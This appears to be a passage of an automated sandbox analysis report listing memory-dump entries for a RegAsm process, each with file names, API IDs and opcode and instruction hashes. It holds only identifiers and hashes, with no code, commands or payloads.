                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: cd829b1daef261b38cda2e39112b668b35dda2c8737084d4024bd853b18e7540
                                                                                          • Instruction ID: 358e3286763561c34ee85bd466bda537ed0ed0323b6f4af8cd5f41f91906db73
                                                                                          • Opcode Fuzzy Hash: cd829b1daef261b38cda2e39112b668b35dda2c8737084d4024bd853b18e7540
                                                                                          • Instruction Fuzzy Hash: 47515BB15087548FE314DF29D89435BBBE1BBC9318F044A2EE4E987350E379DA088B86
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 2ebab458e156e836acb7530aa1ed8d2b5e11f38eeaa05b60e2a345b2a9165fa5
                                                                                          • Instruction ID: 46d8ff1a4caefaebe2e94c248744a64f71dd77e6a362d910dcb9a2d39bbeb24d
                                                                                          • Opcode Fuzzy Hash: 2ebab458e156e836acb7530aa1ed8d2b5e11f38eeaa05b60e2a345b2a9165fa5
                                                                                          • Instruction Fuzzy Hash: C24157357083005BD3249A68CC82B7BB79BEBD9318F29952EE6C587391D77598014789
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 466610d1eed7db160478b47a3cb0bd2e37029faf10b9824fd19cd14644ba36ff
                                                                                          • Instruction ID: c92a34a86bb23cb5d125700b1c76bfd8bf7bd874eebd3ab69d0d39d9b75e20ec
                                                                                          • Opcode Fuzzy Hash: 466610d1eed7db160478b47a3cb0bd2e37029faf10b9824fd19cd14644ba36ff
                                                                                          • Instruction Fuzzy Hash: 5051DF36A05269CFDB04CF78D8903AE77F1FB4A300F094079D946EB251D379AA15CBA4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 68e485f68c9a5901a1d63f30458296e007b08a27a069cb57174dba07fabda5a7
                                                                                          • Instruction ID: ea80b83c3c03882aa2ed7120e8da97de1dc121c3fa98104ded61def1e9a650b3
                                                                                          • Opcode Fuzzy Hash: 68e485f68c9a5901a1d63f30458296e007b08a27a069cb57174dba07fabda5a7
                                                                                          • Instruction Fuzzy Hash: 3041E539748662CFC7408F2CE8E0546B3E6EBCF315F0A4674C685A7756C234AC55CB80
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8390be52d0fc80bac26f8f43f7d91224d4491d22c6b2e7ddedb638a9d9b642ae
                                                                                          • Instruction ID: e016bd3a5b2e30d282accfad9c880c95c39ab5ad24bba6b7600d4b264f96c972
                                                                                          • Opcode Fuzzy Hash: 8390be52d0fc80bac26f8f43f7d91224d4491d22c6b2e7ddedb638a9d9b642ae
                                                                                          • Instruction Fuzzy Hash: A74127B0105BD28AC7258F3591607B3BFE49F63304F58889DC2EB67243D7396106CB58
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d0cf31bbda53bdaf63d7af19f29f28f774909cbd0cf8395fb49311f8268d483d
                                                                                          • Instruction ID: 45f8e07445f81c610541eba171ca969233a893be6d096ae6489b9d199596f542
                                                                                          • Opcode Fuzzy Hash: d0cf31bbda53bdaf63d7af19f29f28f774909cbd0cf8395fb49311f8268d483d
                                                                                          • Instruction Fuzzy Hash: 2031E3B0105BE28AC7258F3491617B3BFE59F53304F48889EC2EB67283D7396106CB59
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2768b30e028b1f09c40714066531c68bd8a443b8113f52f00cae81a3e8f141b5
                                                                                          • Instruction ID: 10f46fcecd15c47a886bc62fa57e6baf36dbd2037378e37e1b19e26551acf6e9
                                                                                          • Opcode Fuzzy Hash: 2768b30e028b1f09c40714066531c68bd8a443b8113f52f00cae81a3e8f141b5
                                                                                          • Instruction Fuzzy Hash: 3E31BDBA8093508FD310CFA6D84465BFBA3EFC6704F04994DE9966B319C7B5C905CB86
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4167519310f43b3517b213ad5fb496a771803268dbf47e8cecfc648a47e6285a
                                                                                          • Instruction ID: c126d631f09cd9a9f574247df608c4ff22f764634754ddfab9fe6016828a3348
                                                                                          • Opcode Fuzzy Hash: 4167519310f43b3517b213ad5fb496a771803268dbf47e8cecfc648a47e6285a
                                                                                          • Instruction Fuzzy Hash: 3011273BF2522207E354EE76ECD86176352EBC531070A0136EE41E33C2C6B6F801D1A4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 41166b6f7e4f0e05e6637b10997c543a5bbec94ddb0782cb59f92e31f1ba3cdf
                                                                                          • Instruction ID: 9152cc26c3f6965d2423ed264715f0ca4ee81f3d25f86ab02babf4cdb26f47c0
                                                                                          • Opcode Fuzzy Hash: 41166b6f7e4f0e05e6637b10997c543a5bbec94ddb0782cb59f92e31f1ba3cdf
                                                                                          • Instruction Fuzzy Hash: 6611C8B1A002008BCB24DF18C8929AB73F5FF45361B06916DE866DB3D1EB38E944C794
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e33286f5dda0f2785d98215aed794458f555d3ca741a238b4e1c24f806b510c0
                                                                                          • Instruction ID: 763a477f0a46276adcb0ec8841214ea2f6aafdb30db98bfe477e0e598379f318
                                                                                          • Opcode Fuzzy Hash: e33286f5dda0f2785d98215aed794458f555d3ca741a238b4e1c24f806b510c0
                                                                                          • Instruction Fuzzy Hash: 93110060608322CAC700CF28E656667B7F0EF92749F45991EE0C18B764E37CCE49DB5A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: af8d4b0c1c5655787436963218c044d1f21c6127c72fe571752f21a726d64fd9
                                                                                          • Instruction ID: dc0a91e69fd6af6c6bcb1056933c6325e335b4ce730711c0c389118c5b6c55af
                                                                                          • Opcode Fuzzy Hash: af8d4b0c1c5655787436963218c044d1f21c6127c72fe571752f21a726d64fd9
                                                                                          • Instruction Fuzzy Hash: 1F019EB1700F1147D620AE15A4C173BE3A86F90749F88443EE84957342DBB9EC45C6AD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6ef14fac7b45e2bde46186b6366a509dac21dc40c7f4894ad4f0bbbe8c4281f8
                                                                                          • Instruction ID: 2ae84854db65c28fae6640ac9f5b5c968dd38e1ad358c9e3a3dc72d8ae56af60
                                                                                          • Opcode Fuzzy Hash: 6ef14fac7b45e2bde46186b6366a509dac21dc40c7f4894ad4f0bbbe8c4281f8
                                                                                          • Instruction Fuzzy Hash: 19E0C233B008154BC70CDD2CCC526B9B3AB5B97210B49D23A9111CB3D6EE38E5168200
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: abaceaab0d131e91e1958e04262fd8535b536775f6d8333e1c0963cfef7c2bd6
                                                                                          • Instruction ID: 7f520365bb2ada4633075929b2cd1fe49d27b29bbce5b1f8259ad3979495c9f3
                                                                                          • Opcode Fuzzy Hash: abaceaab0d131e91e1958e04262fd8535b536775f6d8333e1c0963cfef7c2bd6
                                                                                          • Instruction Fuzzy Hash: 23D0122991A1888BC3258F389C95631F7719B07100F0420BAC542D7292D7B1A416861C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1b85a8fcc0897e52df4e1f0fb9845ec98bb92747b8879fe0b53d59439962be42
                                                                                          • Instruction ID: 64f76c2cc344cdca885dfe3ab8b2c93edc8f0f41a084e4e9fc29601e48989ebb
                                                                                          • Opcode Fuzzy Hash: 1b85a8fcc0897e52df4e1f0fb9845ec98bb92747b8879fe0b53d59439962be42
                                                                                          • Instruction Fuzzy Hash: 8BB012B5E4D510C6E1005E10BD02BB0B374A327308F55343EE10DB3243D5DDD581514F
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: MetricsSystem
                                                                                          • String ID:
                                                                                          • API String ID: 4116985748-3916222277
                                                                                          • Opcode ID: 4b5f0c39f36169d3eb55ba92d9e7a3e60d2817e46aecbd399fccdb499751a225
                                                                                          • Instruction ID: 4bce59276320d5236dab9db9eb4d8fc87b27fcdf99e3867c5ae6ea77b9a5c8f4
                                                                                          • Opcode Fuzzy Hash: 4b5f0c39f36169d3eb55ba92d9e7a3e60d2817e46aecbd399fccdb499751a225
                                                                                          • Instruction Fuzzy Hash: E63190B09193018FDB00EF69E98564DBBF4BF88304F11892DE498DB3A0D774A949CB86